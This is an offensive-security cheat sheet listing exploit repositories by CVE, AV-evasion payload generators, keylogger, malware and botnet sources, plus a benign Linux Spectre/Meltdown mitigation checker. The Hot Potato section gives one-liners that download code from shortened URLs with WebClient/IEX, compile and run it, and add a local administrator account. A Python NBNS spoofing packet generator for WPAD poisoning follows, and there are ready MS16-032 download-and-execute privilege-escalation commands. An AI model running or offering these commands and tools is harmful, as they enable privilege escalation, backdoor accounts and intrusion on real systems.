
Exploits

https://github.com/zacbrown/PowerKrabsEtw
Generate metasploit payloads that bypass common anti-virus solutions
Random Exploits
Tool for exploration and tracing of the Windows kernel
Abusing File-streams in libc
CVE-2017-7269 (IIS 6.0 WebDAV ScStoragePathFromUrl buffer overflow) exploit from the leaked FuzzBunch framework
CTF framework and exploit development library

Meltdown/Spectre
Meltdown EXPLOIT POC linux
Windows Spectre PoC
Linux Spectre PoC
Checking mitigations of Meltdown and Spectre
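
Since kernel 4.15 the Linux kernel reports the status of each of these issues under /sys/devices/system/cpu/vulnerabilities, which is what the checker tools above parse. The following Python is an added example, not code from any of the linked tools: it classifies each status file using the fixed prefixes the kernel writes ("Not affected", "Mitigation:", "Vulnerable", anything else unknown) and returns the list of issues still open. The SAMPLE dictionary is constructed for the example, not captured from a real host, and is used only when the sysfs directory is missing.

```python
"""Parse the Linux sysfs Meltdown/Spectre status files (present since kernel 4.15)."""
from pathlib import Path

SYSFS_VULN_DIR = "/sys/devices/system/cpu/vulnerabilities"

# Constructed sample data for this example, in the format the kernel writes to
# /sys/devices/system/cpu/vulnerabilities/<name>; not captured from a real host.
SAMPLE = {
    "meltdown": "Mitigation: PTI\n",
    "spectre_v1": "Mitigation: usercopy/swapgs barriers and __user pointer sanitization\n",
    "spectre_v2": "Mitigation: Full generic retpoline, IBPB: conditional, IBRS_FW, STIBP: conditional, RSB filling\n",
    "l1tf": "Vulnerable\n",
    "mds": "Vulnerable: Clear CPU buffers attempted, no microcode\n",
    "tsx_async_abort": "Not affected\n",
    "srbds": "Unknown: Dependent on hypervisor status\n",
}


def classify(status: str) -> str:
    """Map one status line to vulnerable / mitigated / not_affected / unknown.
    The kernel uses a fixed set of prefixes; anything else is treated as unknown,
    never as safe."""
    s = status.strip()
    if s == "Not affected":
        return "not_affected"
    if s.startswith("Mitigation:"):
        return "mitigated"
    if s.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def read_sysfs(vuln_dir=SYSFS_VULN_DIR) -> dict:
    """Read every status file; returns {} when the directory is absent (kernel older
    than 4.15, or an architecture that does not expose it). An empty result means
    'no information', which callers must not mistake for 'mitigated'."""
    d = Path(vuln_dir)
    if not d.is_dir():
        return {}
    return {p.name: p.read_text() for p in sorted(d.iterdir()) if p.is_file()}


def report(statuses: dict) -> tuple:
    """Return (per-issue classification, sorted list of issues still vulnerable)."""
    classes = {name: classify(text) for name, text in statuses.items()}
    return classes, sorted(n for n, c in classes.items() if c == "vulnerable")


if __name__ == "__main__":
    live = read_sysfs()
    data = live if live else SAMPLE
    print("source:", "sysfs" if live else "constructed sample")
    classes, still_vulnerable = report(data)
    for name, text in data.items():
        print(f"{name:20} {classes[name]:13} {text.strip()}")
    print("still vulnerable:", still_vulnerable or "none")
```

Run it as root or not; the files are world-readable. On a host where the directory is missing the script falls back to the constructed sample, so a "constructed sample" line in the output means the kernel is too old to report anything and a full checker is needed.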

Intel Active Management Technology (AMT):
- https://www.coalfire.com/The-Coalfire-Blog/April-2019/The-Death-Metal-Suite
- https://github.com/Coalfire-Research/DeathMetal

Version Exploit Search

Buffer overflows

Best Explanation of Buffer overflow

MacOS/iOS Exploits

Exploit in iMessage 7.X.X to install a backdoor

Windows Exploits

https://github.com/51x/WHP
https://github.com/nccgroup/winpayloads
https://github.com/SecWiki/windows-kernel-exploits

Exploits:
MS03-026 - Microsoft RPC DCOM Interface Overflow (kaht2.zip)
MS05-039 - Microsoft Plug and Play Service Overflow, Works with SSDP too
MS08-067 - Remote Stack Overflow Vulnerability Exploit (Server service, srvsvc)
MS10-015/CVE-2010-0232 - Windows NT/2K/XP/2K3/VISTA/2K8/7 x32 ONLY - NtVdmControl()->KiTrap0d local ring0 exploit
CVE-2010-4398 - Elevation of Privileges (UAC Bypass)
MS11-080 - AFD.sys
MS14-058 - TrackPopupMenu Privilege Escalation
MS15-051 - Win32k LPE vulnerability used in APT attack "taihou32"
MS15-134 - Microsoft Windows Media Center Library Parsing RCE Vulnerability aka "self-executing" MCL File

MS11-046/CVE-2011-1249 - Windows x86 (all versions) Afd.sys Privilege Escalation Exploit. MS11-046 - the SYSTEM shell will spawn within the invoking shell/process
MS11-060/CVE-2011-1974 - Windows x86 (XP SP3 / 2003 SP2) Vulnerability in Remote Access Service NDISTAPI Driver
MS11-080/CVE-2011-2005 - XP|2K3 Afd.sys Privilege Escalation Exploit. MS11-080-Add-User - for use in non-interactive meterpreter shell
MS14-002/CVE-2013-5065 - NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 python2exe version demo
MS14-058/CVE-2014-4113 Win7 x32 Kernel Win32k.sys Privilege Escalation Exploit info & Win 8/8.1 Python script info

MS14-040/CVE-2014-1767 AFD.sys dangling pointer - Win7 x32 MS14-040-x32.py example info
MS14-058/CVE-2014-4113 Windows 2K3/VISTA/2K8/7/8/2k12 PandaHurricane Kernel-Mode Driver exploit example
MS14-070/CVE-2014-4076 - Windows 2k3 SP2 TCP/IP IOCTL Privilege Escalation
MS15-010/CVE-2015-0057 Tested Win8.1 x64 - win32k Local Privilege Escalation
MS15-051/CVE-2015-1701 ClientCopyImage Win32k Exploit - exploits improper object handling in the win32k.sys kernel mode driver. x32 Version
MS15-061/CVE-2015-1723 Windows XP/2K3/VISTA/2K8/7 use-after-free vulnerability in the win32k.sys driver.
MS15-076/CVE-2015-2370 - Win7/8.1 Copies a file to any privileged location on disk. More info.
MS16-008/CVE-2015-2553 - Sandboxed Mount Reparse Point Creation Mitigation Bypass Win8.1 Win10
MS16-016/CVE-2016-0051 - Microsoft Windows WebDAV Local Privilege Escalation Vulnerability Win7 x32 info example
MS16-135/CVE-2016-7255 Fancy Bear POC - Requirements: Intel Processor (Haswell or newer) & Windows 10 x64. more info Newer Powershell POC which works on 7/8/8.1/10
KB4018556/CVE-2017-0213 COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP, due to how the COM Marshaller processes interface requests. Should work x32/x64 version of 7,8,10,2k8,2k12,2k16

Eternal Blue (MS17-010)

Eternal Blue Exploit
Older Windows Exploits
Metasploit module exploiting the EternalBlue/DoublePulsar chain.

Hot potato

Hot Potato (nbns spoof + wpad + smb ntlm)

Smashed Potato:
Modification of Hot Potato that bypasses AppLocker (the compiled binary is run through InstallUtil.exe /U rather than executed directly), creates a new user and a courtesy shell; requires .NET 4.x. One-liner for easier pwnage:

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://is.gd/y6cfKV','%temp%\SmashedPotato.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe  /out:"%temp%\SmashedPotatoX64.exe" /platform:x64 "%temp%\SmashedPotato.cs" && InstallUtil.exe /logfile= /LogToConsole=false /U %temp%\SmashedPotatoX64.exe

Tater:
PowerShell implementation of Hot Potato that is loaded straight into memory (on Windows 10 use -Trigger 2):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/fVC1Yd'); Invoke-Tater -Trigger 1 -Command ""net user tater Winter2016 /add && net localgroup administrators tater /add"""
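
The first stage shared by Hot Potato, Smashed Potato and Tater is the NBNS spoof: once the local DNS lookup for WPAD has been made to fail, the tools flood positive NetBIOS name query responses onto 127.0.0.1:137 so that the victim's WPAD lookup resolves to the attacker's local proxy. The following Python is an added example, not code from the Hot Potato or Tater projects: it builds that response packet, parses one back the way the victim's client sees it, and generates the sweep over every 16-bit transaction ID, which the tools need because they cannot observe the ID of the outstanding query. The flag word 0x8500, the TTL of 165 and the 127.0.0.1 target are assumptions taken from typical NBNS poisoners; nothing here is sent on the wire.

```python
"""Build and parse NetBIOS Name Service (UDP/137) positive name query responses."""
import struct

NB_TYPE = 0x0020          # resource record type NB
IN_CLASS = 0x0001
RESPONSE_FLAGS = 0x8500   # response | authoritative answer | recursion desired (assumed; typical for poisoners)


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding (RFC 1001 section 14.1): 15 chars space-padded plus a
    suffix byte, each byte split into two nibbles offset by 'A'; wrapped as a
    32-byte label with a length byte in front and a zero terminator (no scope)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded.append(0x41 + (b >> 4))
        encoded.append(0x41 + (b & 0x0F))
    return b"\x20" + bytes(encoded) + b"\x00"


def decode_netbios_name(label: bytes):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    if len(label) < 34 or label[0] != 0x20 or label[33] != 0:
        raise ValueError("not a scope-less NetBIOS name label")
    enc = label[1:33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_nbns_response(txid: int, name: str, ip: str, ttl: int = 165) -> bytes:
    """Positive name query response: header (TXID, flags, QD=0, AN=1, NS=0, AR=0)
    followed by one answer RR whose RDATA is NB_FLAGS (0x0000: unique, B-node) + IPv4."""
    header = struct.pack(">HHHHHH", txid, RESPONSE_FLAGS, 0, 1, 0, 0)
    rdata = struct.pack(">H4B", 0x0000, *(int(o) for o in ip.split(".")))
    rr = encode_netbios_name(name) + struct.pack(">HHIH", NB_TYPE, IN_CLASS, ttl, len(rdata)) + rdata
    return header + rr


def parse_nbns_response(pkt: bytes) -> dict:
    """Parse what the victim's NBNS client sees. The answer is only accepted if txid
    matches the outstanding query, which is why the Potato tools sweep all 65536 values."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or an != 1:
        raise ValueError("not a single-answer response")
    name, suffix = decode_netbios_name(pkt[12:46])
    rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[46:56])
    nb_flags, a, b, c, d = struct.unpack(">H4B", pkt[56:62])
    return {"txid": txid, "flags": flags, "name": name, "suffix": suffix,
            "type": rtype, "ttl": ttl, "nb_flags": nb_flags, "ip": f"{a}.{b}.{c}.{d}"}


def spoof_packets(name: str, ip: str, txids=range(0x10000)):
    """One response per candidate transaction ID, ready for sendto(('127.0.0.1', 137))."""
    for txid in txids:
        yield build_nbns_response(txid, name, ip)


if __name__ == "__main__":
    pkt = build_nbns_response(0x1234, "WPAD", "127.0.0.1")
    print(pkt.hex())
    print(parse_nbns_response(pkt))
```

The name is looked up with suffix 0x00 (workstation service), so the spoofed answer must carry the same suffix or the client ignores it. On hosts where LLMNR/NBNS is disabled or a static WPAD entry exists this stage never fires, which is the usual reason the Potato family fails on hardened builds.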

MS16-032/CVE-2016-0099

Powershell:

powershell -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/wrlBsL'); Invoke-ms16-032"

C# 64bit:

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe  /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll  /out:"%temp%\ms16-032_X64.exe" /platform:x64 "%temp%\ms16-032.cs" && %temp%\ms16-032_X64.exe

C# 32bit (csc.exe has no x32 target; the 32-bit platform flag is x86):

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe  /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll  /out:"%temp%\ms16-032_X32.exe" /platform:x86 "%temp%\ms16-032.cs" && %temp%\ms16-032_X32.exe

Protocols

Attacking the IPv6 protocol

FreeBSD Kernel

PS4 4.55 BPF Race Condition Kernel Exploit Writeup
PS4 5.05 BPF Double Free Kernel Exploit Writeup

Linux Kernel

CVE-2017-11176: A step-by-step Linux Kernel exploitation
CVE-2016-5195: Dirty Cow root privilege write exploit

Exploits:
https://github.com/SecWiki/linux-kernel-exploits
CVE-2018-18955 (Linux 4.15.x-4.19.2) - map_write() in kernel/user_namespace.c allows privilege escalation
CVE-2018-1000001 (glibc <= 2.26)
CVE-2017-1000367 (Sudo 1.8.6p7 - 1.8.20)
CVE-2017-1000112 - a memory corruption due to UFO to non-UFO path switch
CVE-2017-16995 (Linux 4.4 - 4.14) - Memory corruption caused by BPF verifier
CVE-2017-16939 (Linux < 4.13.11) - UAF in Netlink socket subsystem – XFRM
CVE-2017-7494 (Samba 3.5.0-4.6.4/4.5.10/4.4.14) - Samba Remote execution
CVE-2017-7308 (Linux < 4.10.6) - a signedness issue in AF_PACKET sockets
CVE-2017-6074 (Linux < 4.9.11) - a double-free in DCCP protocol
CVE-2017-5123 (Linux 4.14.0-rc4+) - 'waitid()'
CVE-2016-9793 (Linux < 4.8.14) - a signedness issue with SO_SNDBUFFORCE and SO_RCVBUFFORCE socket options
CVE-2016-5195 (Linux > 2.6.22) - Dirty Cow
CVE-2016-2384 (Linux < 4.5) - a double-free in USB MIDI driver
CVE-2016-0728 (Linux 3.8 - 4.4) - pp_key (keyring refcount overflow)
CVE-2015-7547 (glibc 2.9 - 2.22) - glibc getaddrinfo
CVE-2015-1328 (3.13, 3.16.0, 3.19.0) - overlayfs
CVE-2014-5284 (OSSEC 2.8) - OSSEC
CVE-2014-4699 (Linux < 3.15.4) - ptrace
CVE-2014-4014 (Linux < 3.14.8) - Local Privilege Escalation
CVE-2014-3153 (Linux == 3.3.2-5, 3.2.13, 3.2.9, 3.2.1-2, 3.1.8, 3.0.1-5, 2.6.32-39, 2.6.9-4, 3.0.0-18) - futex
CVE-2014-0196 (Linux == 2.6.31-39, 3.14-15) - rawmodePTY
CVE-2014-0038 (Linux == 3.4-3.13.1) - timeoutpwn
CVE-2013-2094 (Linux == 3.0.0-3.8.9) - perf_swevent
CVE-2013-1858 (Linux == 3.3-3.8) - clown-newuser
CVE-2013-1763 (Linux < 3.8.3) - __sock_diag_rcv_msg
CVE-2013-0268 (Linux == 2.6.18-39, 3.0-3.7) - msr
CVE-2012-3524 (libdbus < 1.5.x) - libdbus
CVE-2012-0056 (Linux == 2.6.39, 3.0.0-6, 3.1.0) - memodipper
CVE-2010-4347 (Linux == 2.6.0-36) - american-sign-language
CVE-2010-4258 (Linux == 2.6.31-37) - full-nelson
CVE-2010-4073 (Linux == 2.6.0-36) - half_nelson
CVE-2010-3904 (Linux == 2.6.30-36) - rds
CVE-2010-3437 (Linux == 2.6.0-36) - pktcdvd
CVE-2010-3301 (Linux == 2.6.26-34) - ptrace_kmod2
CVE-2010-3081 (Linux == 2.6.0-33) - video4linux
CVE-2010-2959 (Linux == 2.6.18-36) - can_bcm
CVE-2010-1146 (Linux == 2.6.18-34) - reiserfs
CVE-2010-0415 (Linux == 2.6.18-31) - do_pages_move
CVE-2009-3547 (Linux == 2.4.4-37, 2.6.15-31) - pipe.c_32bit
CVE-2009-2698 (Linux == 2.6.1-19) - udp_sendmsg_32bit
CVE-2009-2692 (Linux == 2.4.4-37, 2.6.0-30) - sock_sendpage
CVE-2009-2692 (Linux == 2.4.4-37, 2.6.0-30) - sock_sendpage2
CVE-2009-1337 (Linux == 2.6.25-29) - exit_notify
CVE-2009-1185 (Linux == 2.6.25-29) - udev
CVE-2008-4210 (Linux == 2.6.11-22) - ftrex
CVE-2008-0600 (Linux == 2.6.23-24) - vmsplice2
CVE-2008-0600 (Linux == 2.6.17-24.1) - vmsplice1
CVE-2006-3626 (Linux == 2.6.8-16) - h00lyshit
CVE-2006-2451 (Linux == 2.6.13-17) - raptor_prctl
CVE-2005-0736 (Linux == 2.6.5-11) - krad3
CVE-2005-1263 (Linux == 2.0-2.2.27-rc2, 2.4.0-31-pre1, 2.6.0-12-rc4) - binfmt_elf.c
CVE-2004-1235 (Linux == 2.4.29) - elflbl
CVE-N/A (Linux == 2.6.34-36) - caps_to_root
CVE-2004-0077 (Linux == 2.4.20, 2.2.24-2.4.27) - mremap_pte

Linux Privilege Escalation

Office Exploits

Office for Mac Macro Payload Generator
Obfuscate Office documents to bypass antimalware detection
Generate Office documents embedded with the DDE, macro-less command execution technique.

Backdoors

Backdoor any python script
Injecting fake backdoored updates

Apps

How a double-free bug in WhatsApp turns into RCE

HTTP

Deliver Encrypted Browser Exploits
Remote Code execution with JBOSS

XSS:
XSS to RCE

Writing Exploits

Shellcode Database
Old Shellcode Archive
Malware FUD Cryptor
Writing Malware For Fun and Profit
http://blog.trailofbits.com/2013/05/14/writing-exploits-with-the-elderwood-kit-part-1/
Primer on Return-Oriented Programming
NSA's Metasploit in Python
Shellcode/Obfuscate Code Generator
Shell Code generator and helper

Examples:
Simple linux keylogger in C

Generate Exploits

Multi Platform payload generator
MSFvenom Payload Creator
(metasploit) shellcode generator/compiler/listener

Crypt Exploits:
Crypt msfvenom output

Malware Programing

Malware techniques for detecting virtual machines, emulators, debuggers and sandboxes.
Injecting code into another process and creating a thread in it
Build your own botnet
botnet source codes

Joke Exploits

Jurassic Park hacking scene
Man in the Middle JSCrypto Miner for Wifi networks
Morpheus - Funny MITM attacks

TV Exploits

https://github.com/RootMyTV/RootMyTV.github.io